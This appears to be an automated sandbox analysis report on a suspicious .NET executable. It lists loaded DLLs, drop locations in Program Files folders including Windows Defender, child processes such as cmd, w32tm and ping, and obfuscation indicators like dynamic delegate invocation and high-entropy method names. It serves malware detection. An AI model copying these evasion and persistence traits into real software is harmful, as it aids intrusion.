                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Multimedia Platform\0b77faa1f189a8Jump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Defender\0b77faa1f189a8Jump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\0b77faa1f189a8Jump to behavior
                            Source: KPFv8ATDx0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: KPFv8ATDx0.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: KPFv8ATDx0.exeStatic file information: File size 2882048 > 1048576
                            Source: KPFv8ATDx0.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2bf200
                            Source: KPFv8ATDx0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbL source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1867465458.000000001C9A0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbP source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBC9000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.cs.Net Code: Type.GetTypeFromHandle(veIX2WBfcHAjKFSyqO0.RXSkWJnklKG(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(veIX2WBfcHAjKFSyqO0.RXSkWJnklKG(16777246)),Type.GetTypeFromHandle(veIX2WBfcHAjKFSyqO0.RXSkWJnklKG(16777260))})
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7A2547 push eax; ret 0_2_00007FFAAC7A2548
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7A2551 push eax; ret 0_2_00007FFAAC7A2552
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7A3AEC push E8FFFFFCh; retf 0_2_00007FFAAC7A3AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7D2547 push eax; ret 7_2_00007FFAAC7D2548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7D2551 push eax; ret 7_2_00007FFAAC7D2552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7D3AEC push E8FFFFFCh; retf 7_2_00007FFAAC7D3AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAACCE7562 push ebx; iretd 7_2_00007FFAACCE756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC802547 push eax; ret 14_2_00007FFAAC802548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC802551 push eax; ret 14_2_00007FFAAC802552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC803AEC push E8FFFFFCh; retf 14_2_00007FFAAC803AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD17563 push ebx; iretd 14_2_00007FFAACD1756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD06A85 push eax; iretd 14_2_00007FFAACD06AAA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD06E5D push edx; iretd 14_2_00007FFAACD06E9A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0761D push esp; iretd 14_2_00007FFAACD0763A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0783D push ebp; iretd 14_2_00007FFAACD0787A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0745D push ebx; iretd 14_2_00007FFAACD0747A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0000B push cs; iretd 14_2_00007FFAACD0007A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD07FF5 push edi; iretd 14_2_00007FFAACD0801A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8A2551 push eax; ret 20_2_00007FFAAC8A2552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8A2547 push eax; ret 20_2_00007FFAAC8A2548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8A3AEC push E8FFFFFCh; retf 20_2_00007FFAAC8A3AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAACDB7563 push ebx; iretd 20_2_00007FFAACDB756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC649B95 push ss; iretd 26_2_00007FFAAC649B9D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC892551 push eax; ret 26_2_00007FFAAC892552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC892547 push eax; ret 26_2_00007FFAAC892548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC893AEC push E8FFFFFCh; retf 26_2_00007FFAAC893AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAACDA7563 push ebx; iretd 26_2_00007FFAACDA756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC676504 push edi; iretd 34_2_00007FFAAC676505
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC6751AE push es; iretd 34_2_00007FFAAC6751AF
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC6765E1 push esp; ret 34_2_00007FFAAC6765E8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC69276C push E8FFFFFEh; ret 34_2_00007FFAAC692771
                            Source: KPFv8ATDx0.exe, tpqnt90FpZcrRC8ZHbx.csHigh entropy of concatenated method names: 'KSM0UfF7Dn', 'zAn0doLN3R', 'Hri06cIsQu', 'lCG0KaeOdP', 'Slr0NPFTB3', 'NLI0ibT82w', 'DnK0qpMP3a', 'nYY00Uos8v', 'IXf5iK8CIriTrbheiXs4', 'EPuvvX8CP86qg0AQud1n'
                            Source: KPFv8ATDx0.exe, oPrXaY5D9MMLZafQbdA.csHigh entropy of concatenated method names: 'm4t5d6mkBj', 'mNu56bnx8l', 'iZt5KqqLyt', 'NtiFLd8st13dtX5aL826', 'g1GYah8s4urAfYBDyVyG', 'LANRnd8sP1ODrc6X6XLi', 'F7FliF8sIqjeU0ijm4Rq', 'AKR5mZ4nEa', 'HPp5cy0cH3', 'kQl5yMrYVv'
                            Source: KPFv8ATDx0.exe, AKuTxvJnOolwXmT1xkf.csHigh entropy of concatenated method names: 'dylJmFmsVy', 'rT1Jcc1FXw', 'PJvy1181IA8pMbS8lRu0', 'sSaCEO81PSebyVuwJuQs', 'JrpnnR81t5oGiTFvv7ap', 'bdCn4m81Yo8H72nnOFt2', 'uciJ4hAI6Y', 'FOxJPlWYK9', 'k63Jtf2UBl', 'ntHJIsMqEP'
                            Source: KPFv8ATDx0.exe, IKTr0OYQ0IhqM6G8xC5.csHigh entropy of concatenated method names: 'rusYJxq8uJ', 'iqqYWnAo8N', 'a0DY56vjos', 'tqPYLvj26B', 'E00YjycUkJ', 'a86NmR8U0bI2IOk6FGDK', 'I8OKir8UitdYXFsMNRNX', 'b5gSsn8UqnSGjw0MD2KN', 'PGUuwa8UgXYjOQBftb3l', 'Tc023E8UVx4VdXxkNkYI'
                            Source: KPFv8ATDx0.exe, jLCaJ8Dn6roE9Zrhsuw.csHigh entropy of concatenated method names: 'LMdsX82ORW', 'EYW1EU8Ni8PZxvRhYw7i', 'WwkPGJ8NKD4uXStkRfHg', 'oBldrn8NNj2ZkMyxL49t', 'i5X', 'ieuD4NSOYW', 'W93', 'L67', '_2PR', 'p6J'
                            Source: KPFv8ATDx0.exe, a4DlukYq2kuv7JGw4q4.csHigh entropy of concatenated method names: 'QAkYgPMmwT', 'wvWYVt0CRP', 'nqkY9YeTNH', 'XxNYCffGD9', 'y0OYBVFUww', 'D3gYGA78d3', 'qx6YzUBUI1', 'nPNb7YCcPR', 'Odpb8svMBr', 'pMJbkWvK8o'
                            Source: KPFv8ATDx0.exe, l2hdqSQOK5dZI1kfiWI.csHigh entropy of concatenated method names: 'vtyQYoWRgY', 'mJRQboW6PU', 'QNiQE96yEf', 'hNGuQP8ER00EeSnnEnXr', 'eAnosd8ELdaj9r78I6ia', 'CwrlyB8EjJ3xKlI03LXm', 'lACQ4RC5NV', 'NVIQPdyoXN', 'kG7aF88EWZfT6VpTc7lu', 'kc6j9P8EoTEMecACxKpi'
                            Source: KPFv8ATDx0.exe, lIkVJkQBG5vnowlaKq4.csHigh entropy of concatenated method names: 'oQGo313NYk', 'O7EOHw8MooY1NtEUYZ4d', 'IJwBsX8MJ1F4ZfY85J2h', 'eADJLJ8MkRigZkM9K5Lw', 'qianFf8MQh74TuE0roaE', 'p3hy1T8M5OZJECKHBvhd', 'Sy8QgS8MLTN75fWaWXQ5', 'WTKOAa8MjRO7mmqX5UVQ', 'kbConLrA6B', 'IZyG0Y8MvCdEmUiVyKAV'
                            Source: KPFv8ATDx0.exe, g1TSVFKilTxW7YwYEoa.csHigh entropy of concatenated method names: 'limK0Q6k8l', 'fl2KgQdB7I', 'tikKVo6wf6', 'IitK9d5vOE', 'uiEKCBhDVc', 'qaVKB8kJAW', 'oOwKGW8aq6', 'M2rKzvMn4f', 'ABRN7EelTH', 'LJvN8hw593'
                            Source: KPFv8ATDx0.exe, R4N6lygaEGJ5in3cyHe.csHigh entropy of concatenated method names: 'zIqgeKmiDR', 'zaSg3JFUqH', 'AkigXQfy8d', 'zQ2gOibKFL', 'hC7gfVYcDZ', 'pZagHB0X8w', 'a9OWer8CqOcTrt3eEnsq', 'ODddb98C09WOOZ1W5XtM', 'BYgJ1U8CgWtOBX0b4LR6', 'YStG118CVjS839uiAWZP'
                            Source: KPFv8ATDx0.exe, wsITGG1WpVnOXiCEwuE.csHigh entropy of concatenated method names: 'jAUNVf8NmdTUoi9fI6VE', 'iGFKLh8NDhxoOpx5e2Hg', 'QaEXMH8NsaMM97Knk8pg', 'CVrVSA8NcWuDwK1Agsd2', 'U8L1L6Qo4a', '_1R8', '_3eK', 'JNP1jtV67j', 'w2d1RvqjOr', 'LFr12K0ukP'
                            Source: KPFv8ATDx0.exe, OetG7IQmJxHX3IEMEnr.csHigh entropy of concatenated method names: 'fFpQyoq34w', 'zSSQTEnQGX', 'L4OQxuyPfK', 'yebQuT4Lpl', 'vEIQSA9Jjs', 'RZDQw2HoXj', 'CmFQFDasSe', 'cu7Qhs21i2', 'y5gQUIT6cm', 'aMGQdwmEcP'
